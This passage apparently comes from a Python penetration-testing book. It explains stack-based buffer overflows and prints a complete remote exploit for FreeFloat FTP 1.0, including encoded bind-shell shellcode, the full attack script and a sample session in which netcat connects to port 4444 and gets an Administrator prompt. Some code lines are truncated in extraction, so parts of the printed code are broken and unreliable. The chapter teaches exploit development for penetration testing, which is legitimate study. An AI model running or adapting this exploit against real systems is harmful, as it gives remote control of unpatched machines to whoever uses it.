Authors: TJ O'Connor
The preceding section and the Conficker worm made use of a stack corruption vulnerability. While the Metasploit Framework contains over eight hundred unique exploits in its arsenal, you may encounter a time when you have to write your own remote code execution exploit. This section explains how Python can help simplify that process. In order to do so, lets begin by understanding stack-based buffer overflows.
The Morris Worm succeeded in part because of a stack-based buffer overflow against the Finger service (
US v. Morris, 1991
). This class of exploits succeeds because a program fails to sanitize or validate a user input. Although the Morris Worm made use of a stack-based buffer overflow attack in 1988, it was not until 1996 that Elias Levy (a.k.a. Aleph One) published the seminal paper, “Smashing the Stack for Fun and Profit” in Phrack Magazine (
One, 1996
). If you feel unfamiliar with how stack-based buffer overflow attacks work or would like to learn more, consider reading Elias’s paper. For our purposes, we
will take the time to illustrate only the key concepts behind a stack-based buffer overflow attack.
In the case of a stack-based buffer overflow, unchecked user data overwrites the next instruction pointer [EIP] to take control of a program’s flow. The exploit directs the EIP register to point to a location containing shellcode inserted by the attacker. A series of machine code instructions, shellcode, can allow the exploit to add an additional user on to the target system, make a network connection with the attacker, or download a stand-alone executable. Endless shellcode possibilities exist, solely depending on the size of available space in memory.
More Information…
Essential elements of stack-based buffer overflow exploit
Overflow: user input that exceeds the expected value allotted in the stack.
Return Address: The 4-byte address used to jump directly to the top of the stack. In the following exploit, we use a 4-byte address that points to a JMP ESP instruction in the kernel32.dll.
Padding: A series of NOP (no operation) instructions that precedes the shellcode, allowing an attacker to guestimate the address location to jump directly to. If an attacker lands anywhere in the NOP-sled, he slides directly into the shellcode.
Shellcode: A small piece of code written in assembly machine code. In the following example, we generated shellcode using the Metasploit framework.
While many methods for writing exploits exist today, stack-based buffer overflows provided the original exploit vector. However, an abundance of these exploits exist today and continue to grow. In July of 2011, an acquaintance of mine posted an exploit for a vulnerable FTP server to packetstorm (
Freyman, 2011
). Although the development of the exploit may appear to be a complex task, the actual attack contains less than eighty lines of code (including about thirty lines of shell code).
Let’s begin by building the key elements of our exploit. First we set our
shellcode
variable to contain the hexadecimal encoding for a payload we created with the Metasploit Framework. Next, we set our
overflow
variable to contain 246 instances of the letter “A” (\x41 in hex). Our
return
address variable points to an address location in kernel32.dll containing an instruction that jumps directly to the top of the stack. Our
padding
variable contains a series of 150 NOP instructions. This builds our NOP-sled. Finally, we assemble all of these variables together into a variable we call
crash
.
shellcode = (“\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9”
“\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f”
“\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8”
“\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7”
“\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5”
“\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c”
“\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0”
“\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49”
“\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96”
“\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82”
“\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf”
“\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41”
“\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f”
“\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a”
“\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b”
“\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a”
“\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3”
“\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea”
“\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8”
“\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6”
“\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea”
“\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30”
“\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53”
“\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85”
“\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25”
“\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10”
“\xba\x1e\x53\x31”)
overflow = “\x41” ∗ 246
ret = struct.pack(‘
padding = “\x90” ∗ 150
crash = overflow + ret + padding + shellcode
Using the Berkeley Socket API, we will create a connection to the TCP port 21 on our target host. If this connection succeeds, we will then authenticate to the host by sending an anonymous username and password. Finally, we will send the FTP command “RETR” followed by our crash variable. Since the affected program does not properly sanitize user input, this will result in a stack-based
buffer overflow that overwrites the EIP register allowing the program to jump directly into and execute our shellcode.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print “[-] Connection to “+target+” failed!”
sys.exit(0)
print “[∗] Sending ” + ‘len(crash)‘ + “ ” + command +“ byte crash...”
s.send(“USER anonymous\r\n”)
s.recv(1024)
s.send(“PASS \r\n”)
s.recv(1024)
s.send(“RETR” +“ ” + crash + “\r\n”)
time.sleep(4)
Putting this all together, we have Craig Freyman’s original exploit as posted to packet storm.
#!/usr/bin/Python
#Title: Freefloat FTP 1.0 Non Implemented Command Buffer Overflows
#Author: Craig Freyman (@cd1zz)
#Date: July 19, 2011
#Tested on Windows XP SP3 English
#Part of FreeFloat pwn week
#Vendor Notified: 7-18-2011 (no response)
#Software Link:
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php
import socket, sys, time, struct
if len(sys.argv) < 2:
print “[-]Usage:%s
print “[-]For example [filename.py 192.168.1.10 PWND] would do the trick.”
print “[-]Other options: AUTH, APPE, ALLO, ACCT”
sys.exit(0)
target = sys.argv[1]
command = sys.argv[2]
if len(sys.argv) > 2:
platform = sys.argv[2]
#./msfpayload windows/shell_bind_tcp r | ./msfencode -e x86/shikata_ga_nai -b “\x00\xff\x0d\x0a\x3d\x20”
#[∗] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
shellcode = (“\xbf\x5c\x2a\x11\xb3\xd9\xe5\xd9\x74\x24\xf4\x5d\x33\xc9”
“\xb1\x56\x83\xc5\x04\x31\x7d\x0f\x03\x7d\x53\xc8\xe4\x4f”
“\x83\x85\x07\xb0\x53\xf6\x8e\x55\x62\x24\xf4\x1e\xd6\xf8”
“\x7e\x72\xda\x73\xd2\x67\x69\xf1\xfb\x88\xda\xbc\xdd\xa7”
“\xdb\x70\xe2\x64\x1f\x12\x9e\x76\x73\xf4\x9f\xb8\x86\xf5”
“\xd8\xa5\x68\xa7\xb1\xa2\xda\x58\xb5\xf7\xe6\x59\x19\x7c”
“\x56\x22\x1c\x43\x22\x98\x1f\x94\x9a\x97\x68\x0c\x91\xf0”
“\x48\x2d\x76\xe3\xb5\x64\xf3\xd0\x4e\x77\xd5\x28\xae\x49”
“\x19\xe6\x91\x65\x94\xf6\xd6\x42\x46\x8d\x2c\xb1\xfb\x96”
“\xf6\xcb\x27\x12\xeb\x6c\xac\x84\xcf\x8d\x61\x52\x9b\x82”
“\xce\x10\xc3\x86\xd1\xf5\x7f\xb2\x5a\xf8\xaf\x32\x18\xdf”
“\x6b\x1e\xfb\x7e\x2d\xfa\xaa\x7f\x2d\xa2\x13\xda\x25\x41”
“\x40\x5c\x64\x0e\xa5\x53\x97\xce\xa1\xe4\xe4\xfc\x6e\x5f”
“\x63\x4d\xe7\x79\x74\xb2\xd2\x3e\xea\x4d\xdc\x3e\x22\x8a”
“\x88\x6e\x5c\x3b\xb0\xe4\x9c\xc4\x65\xaa\xcc\x6a\xd5\x0b”
“\xbd\xca\x85\xe3\xd7\xc4\xfa\x14\xd8\x0e\x8d\x12\x16\x6a”
“\xde\xf4\x5b\x8c\xf1\x58\xd5\x6a\x9b\x70\xb3\x25\x33\xb3”
“\xe0\xfd\xa4\xcc\xc2\x51\x7d\x5b\x5a\xbc\xb9\x64\x5b\xea”
“\xea\xc9\xf3\x7d\x78\x02\xc0\x9c\x7f\x0f\x60\xd6\xb8\xd8”
“\xfa\x86\x0b\x78\xfa\x82\xfb\x19\x69\x49\xfb\x54\x92\xc6”
“\xac\x31\x64\x1f\x38\xac\xdf\x89\x5e\x2d\xb9\xf2\xda\xea”
“\x7a\xfc\xe3\x7f\xc6\xda\xf3\xb9\xc7\x66\xa7\x15\x9e\x30”
“\x11\xd0\x48\xf3\xcb\x8a\x27\x5d\x9b\x4b\x04\x5e\xdd\x53”
“\x41\x28\x01\xe5\x3c\x6d\x3e\xca\xa8\x79\x47\x36\x49\x85”
“\x92\xf2\x79\xcc\xbe\x53\x12\x89\x2b\xe6\x7f\x2a\x86\x25”
“\x86\xa9\x22\xd6\x7d\xb1\x47\xd3\x3a\x75\xb4\xa9\x53\x10”
“\xba\x1e\x53\x31”)
#7 FFE4 JMP ESP kernel32.dll
ret = struct.pack(‘
padding = “\x90” ∗ 150
crash = “\x41” ∗ 246 + ret + padding + shellcode
print “\
[∗] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow\n\
[∗] Author: Craig Freyman (@cd1zz)\n\
[∗] Connecting to “+target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target, 21))
except:
print “[-] Connection to “+target+” failed!”
sys.exit(0)
print “[∗] Sending “ + ‘len(crash)‘ + “ “ + command +” byte crash...”
s.send(“USER anonymous\r\n”)
s.recv(1024)
s.send(“PASS \r\n”)
s.recv(1024)
s.send(command +“ ” + crash + “\r\n”)
time.sleep(4)
After downloading a copy of a FreeFloat FTP to either a Windows XP SP2 or SP3 machine, we can test Craig Freyman’s exploit. Notice he used shellcode that binds a TCP port 4444 on the vulnerable target. So we will run our exploit script and use the netcat utility to connect to port 4444 on the target host. If everything succeeds, we now have access to a command prompt on the vulnerable target.
attacker$ python freefloat2-overflow.py 192.168.1.37 PWND
[∗] Freefloat FTP 1.0 Any Non Implemented Command Buffer Overflow
[∗] Author: Craig Freyman (@cd1zz)
[∗] Connecting to 192.168.1.37
[∗] Sending 768 PWND byte crash...
attacker$ nc 192.168.1.37 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\>
Congratulations! We have written our own tools that can be used during a penetration test. We started by building our own port scanner. Next, we examined ways for attacking the SSH, FTP and SMB protocols and then finished with constructing our own zero-day exploit using Python.
Hopefully, you will write code an endless amount of times during a penetration test. We have demonstrated some of the basics behind building Python scripts with the intention of advancing our penetration tests. Now that we have a
better understanding of the capabilities of Python, let’s examine how we can write some scripts to aid us in Forensic investigations.
1. Ahmad, D. (2008) Two years of broken crypto: Debian’s dress rehearsal for a global PKI compromise.
IEEE Security & Privacy
, pp. 70-73.
2. Albright, D., Brannan, P., & Walrond, C. (2010). Did Stuxnet Take Out 1,000 Centrifuges at the Natanz Enrichment Plant?
ISIS REPORT
, November 22.
3. Eichin, M., & Rochlis, J. (1989). With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988, February 9. <
www.utdallas.edu/~edsha/UGsecurity/internet-worm-MIT.pdf
> Retrieved 31.10.11.
4. Elmer-Dewitt, P., McCarroll, T., & Voorst, B. V. (1988). Technology: the kid put us out of action.
Time Magazine
, October 14. <
http://www.time.com/time/magazine/article/0, 9171, 968884, 00.html
> Retrieved 30.10.11.
5. Freyman, C. (2011). FreeFloat FTP 1.0 Any Non Implemented Command Buffer Overflow ≈ Packet Storm.
Packet Storm ≈ Full Disclosure Information Security
, July 18. <
http://packetstormsecurity.org/files/view/103166/freefloat2-overflow.py.txt
> Retrieved 31.10.11.
6. GAO. (1989). Report to the Chairman, Subcommittee on Telecommunications and Finance, Committee on Energy and Commerce House of Representatives. “Virus Highlights Need for Improved Internet Management.”
United States General Accounting Office
.
7. Huang, W. (2011). Armorize Malware Blog: k985ytv mass compromise ongoing, spreads fake antivirus.
Armorize Malware Blog
, August 17. <
http://blog.armorize.com/2011/08/k985ytvhtm-fake-antivirus-mass.html
> Retrieved 31.10.11.
8. Markoff, J. (2009). Defying experts, rogue computer code still lurks.
The New York Times
, August 27. <
http://www.nytimes.com/2009/08/27/technology/27compute.html
> Retrieved 30.10.11.
9. Moore, H. D. (2008). Debian OpenSSL predictable PRNG toys.
Digital Offense
. <
http://digitaloffense.net/tools/debian-openssl/
> Retrieved 30.10.11.
10. Nahorney, B. (2009). The Downadup Codex a comprehensive guide to the threat’s mechanics.
Symantec | Security Response
. <
www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_downadup_codex_ed2.pdf
> Retrieved 30.10.11.
11. One, A. (1996). Smashing the stack for fun and profit.
Phrack Magazine
, August 11. <
http://www.phrack.org/issues.html?issue=49&id=14#article
> Retrieved 30.10.11.
12. US v. Morris (1991). 928 F. 2d 504, (C. A. 2nd Circuit. Mar. 7).
Google Scholar
. <
http://scholar.google.com/scholar_case?case=551386241451639668
> Retrieved 31.10.11.
13. Vaskovich, F. (1997). The Art of Port Scanning.
Phrack Magazine
, September 1. <
http://www.phrack.org/issues.html?issue=51-@@-id=11#article
> Retrieved 31.10.11.